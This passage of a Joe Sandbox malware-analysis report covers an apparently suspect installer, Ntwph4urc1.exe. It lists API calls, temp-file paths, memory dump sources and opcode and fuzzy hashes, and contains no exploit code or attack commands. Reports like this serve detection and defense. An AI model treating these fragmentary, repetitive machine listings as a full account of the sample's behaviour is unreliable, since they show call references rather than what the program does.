                                            • GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405E34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 3248276644-289207000
                                            • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                            • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                            • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                            • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                            APIs
                                            • CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,?,00405DE2,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D7C
                                            • CharNextW.USER32(00000000), ref: 00405D81
                                            • CharNextW.USER32(00000000), ref: 00405D99
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp, xrefs: 00405D6F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 3213498283-3523672939
                                            • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                            • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                            • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                            • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040348F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040348F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                            • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CC3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 2659869361-2382934351
                                            • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                            • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                            • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                            • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                            APIs
                                            • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp\System.dll), ref: 0040268D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp$C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp\System.dll
                                            • API String ID: 1659193697-2002882148
                                            • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                            • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                            • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                            • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                            • GetTickCount.KERNEL32 ref: 00402FE2
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                            • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                            • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                            • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                            • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004053F9
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                              • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                            • Instruction ID: 5f6fd1bc1cb6019f344e496d8f57972e5ce8a9055d244d91c322c77d39ebf2aa
                                            • Opcode Fuzzy Hash: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                            • Instruction Fuzzy Hash: 63018431101608AFEF205F11DD80BDB3725EB95355F508037FA00762E1C77A8C919A6D
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                            • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: Call
                                            • API String ID: 3356406503-1824292864
                                            • Opcode ID: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                            • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                            • Opcode Fuzzy Hash: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                            • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                            APIs
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                            • CloseHandle.KERNEL32(?), ref: 00405A0D
                                            Strings
                                            • Error launching installer, xrefs: 004059EA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                            • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                            • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                            • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                            APIs
                                            • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                            • GlobalFree.KERNEL32(00ADE088), ref: 00403A49
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403A28
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 1100898210-2382934351
                                            • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                            • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                            • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                            • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3976562730
                                            • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                            • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                            • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                            • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 7435116A
                                            • GlobalFree.KERNEL32(00000000), ref: 743511C7
                                            • GlobalFree.KERNEL32(00000000), ref: 743511D9
